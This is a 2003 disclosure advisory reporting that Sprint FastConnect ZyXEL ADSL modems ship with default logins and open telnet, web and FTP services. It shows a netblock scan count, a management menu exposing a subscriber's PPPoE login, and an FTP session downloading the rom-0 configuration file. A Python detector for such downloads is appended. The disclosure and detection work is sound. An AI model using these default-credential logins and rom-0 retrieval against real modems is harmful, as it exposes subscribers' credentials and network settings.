Thursday, January 23 2003

Sprint FastConnect[insert little registration r here] ADSL provides the Zyxel series of modem/routers to their customers. The problem is that all these devices are factory set with default, commonly known logins and passwords, and include a little http, ftp and telnet server. This allows for remote configuration of the network settings and a host of other things, including uploading and downloading the modem configuration file rom-0, rebooting the modem, changing the modem's remote management login and password, and various other "high-tech" fiddling possibilities, through both telnet and web. Certainly not of interest or of need to your generic subscriber.

Quick pretend examination of:

    Sprint NETBLK-SPRINTBLK (NET-198-67-0-0-1)                      198.67.0.0 - 198.70.255.255
    LTD SPRINT FLA ANS ISP FON-332652953698729 (NET-198-70-208-0-1) 198.70.208.0 - 198.70.223.255

shows 800 out of 2000 [of 100,000 or so] affected modems. Closer examination confirms:

    Copyright (c) 1994 - 2002 ZyXEL Communications Corp.

                          P645ME+ Main Menu

    Getting Started                      Advanced Management
      1. General Setup                     21. Filter Set Configuration
      3. Ethernet Setup                    22. SNMP Configuration
      4. Internet Access Setup             23. System Password
                                           24. System Maintenance
                                           25. IP Routing Policy Setup
    Advanced Applications                  26. Schedule Setup
      11. Remote Node Setup
      12. Static Routing Setup
      15. SUA Server Setup
                                           99. Exit

                    Enter Menu Selection Number:

Punching in number four [4] on our replica modem, we get:

    Menu 4 - Internet Access Setup

      ISP's Name= MyISP
      Encapsulation= PPPoE
      Multiplexing= LLC-based
      VPI #= 8
      VCI #= 35
      Service Name=
      My Login= grandpamalware@malware.com
      My Password= ********
      Single User Account= Yes
      IP Address Assignment= Dynamic
      IP Address= N/A
      ENET ENCAP Gateway= N/A

    Press ENTER to Confirm or ESC to Cancel:

Playing with our replica modem a bit more, we GET:

    ftp> open malware.com
    Connected to malware.com.
    220 Sprint FTP version 1.0 ready at Wed Jan 5 17:20:47 2000
    User (malware.com:(none)):
    331 Enter PASS command
    Password:
    230 Logged in
    ftp> get rom-0
    200 Port command okay
    150 Opening data connection for RETR rom-0
    226 File sent OK
    ftp: 16384 bytes received in 2.03Seconds 8.07Kbytes/sec.
    ftp>

Due to our modem only being a replica, we are unable to determine whether uploading our custom-crafted rom-0 file from our second replica modem to our first will (a) register the user data from there to there, inclusive of user name and password, and/or (b) overwrite the configuration file in such a way that our modem then becomes useless. But without a doubt, we are not happy to see Grandpappy's private email address out in the open for the whole world to see.

Notes:

1. The provider suggests that slapping up a web page with instructions to disable this "feature" will be the solution. We would suggest fire-walling off the ftp, http and telnet ports of the entire affected user base, rolling out the trucks, and physically reconfiguring each and every affected subscriber's modem, or replacing them.

2. PRIVACY PRIVACY PRIVACY. In this day and age, it is all we have left!

3. http://www.wired.com/news/infostructure/0,1377,57342,00.html

4. Victims of this: contact your provider as soon as possible and have them hand-hold you through disabling this "feature". Better yet, insist they send over the installer to do it for you. After all, it should have been done at time of installation.

End Call

--
http://www.malware.com
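As a detection-side illustration of the rom-0 exposure described above, here is an added example (not part of the original advisory) that runs over constructed FTP control-channel transcripts modelled on the session shown and flags any session in which an authenticated client completed a RETR of rom-0, while a refused login or refused fetch is not counted. The "S:"/"C:" direction prefixes, the "admin" user name and the password values are constructed placeholders, not real credentials.

```python
import re
# Constructed FTP control-channel transcripts modelled on the session in the
# advisory: "S:" lines are server replies, "C:" lines are client commands.
EXPOSED_SESSION = """\
S: 220 Sprint FTP version 1.0 ready at Wed Jan 5 17:20:47 2000
C: USER admin
S: 331 Enter PASS command
C: PASS ********
S: 230 Logged in
C: RETR rom-0
S: 150 Opening data connection for RETR rom-0
S: 226 File sent OK""".splitlines()
# Same modem after the default credentials were changed: the fetch is refused.
REFUSED_SESSION = """\
S: 220 Sprint FTP version 1.0 ready at Wed Jan 5 17:21:02 2000
C: USER admin
S: 331 Enter PASS command
C: PASS notthedefault
S: 530 Login incorrect
C: RETR rom-0
S: 530 Please login first""".splitlines()

CONFIG_FILES = {"rom-0"}  # ZyXEL configuration image named in the advisory
REPLY = re.compile(r"^S: (\d{3})[ -]?(.*)$")
CMD = re.compile(r"^C: ([A-Za-z]{3,4})(?: (.*))?$")

def analyse(lines):
    """Return (logged_in, transferred): files whose RETR got a 226 completion.
    Any 4xx/5xx reply cancels the pending RETR, so refused fetches do not count."""
    logged_in, pending, transferred = False, None, []
    for line in lines:
        if m := CMD.match(line):
            if m.group(1).upper() == "RETR":
                pending = (m.group(2) or "").strip()
        elif m := REPLY.match(line):
            code = m.group(1)
            if code == "230":
                logged_in = True
            elif code == "226" and pending is not None:
                transferred.append(pending)
                pending = None
            elif code[0] in "45":
                pending = None
    return logged_in, transferred

def config_leaked(lines):
    """True when an authenticated session completed a RETR of a config file."""
    logged_in, transferred = analyse(lines)
    return logged_in and any(f in CONFIG_FILES for f in transferred)
```

Run against a capture of a subscriber line or an ISP-side sensor feed, a True result means the modem's configuration image, PPPoE login included, has already left the device.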